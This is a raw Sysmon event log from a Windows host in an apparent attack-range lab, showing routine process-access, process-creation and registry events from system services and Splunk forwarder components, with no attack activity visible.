16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:49.126{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-4982-6008-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000031235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.969{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5657-6008-0807-00000000A301}7960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.969{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.969{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.969{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.969{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.969{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5657-6008-0807-00000000A301}7960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.969{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5657-6008-0807-00000000A301}7960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.970{7901BC46-5657-6008-0807-00000000A301}7960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000031227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000031226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x003230b1) 13241300x800000000000000031225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ef3e-0x9dd5e40a) 13241300x800000000000000031224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ef46-0xff9a4c0a) 13241300x800000000000000031223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ef4f-0x615eb40a) 13241300x800000000000000031222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000031221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x003230b1) 13241300x800000000000000031220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ef3e-0x9dd5e40a) 13241300x800000000000000031219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ef46-0xff9a4c0a) 13241300x800000000000000031218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:07.641{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ef4f-0x615eb40a) 10341000x800000000000000031217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.297{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5657-6008-0707-00000000A301}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.297{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.297{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.297{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.297{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.297{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5657-6008-0707-00000000A301}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.297{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5657-6008-0707-00000000A301}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:07.298{7901BC46-5657-6008-0707-00000000A301}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk 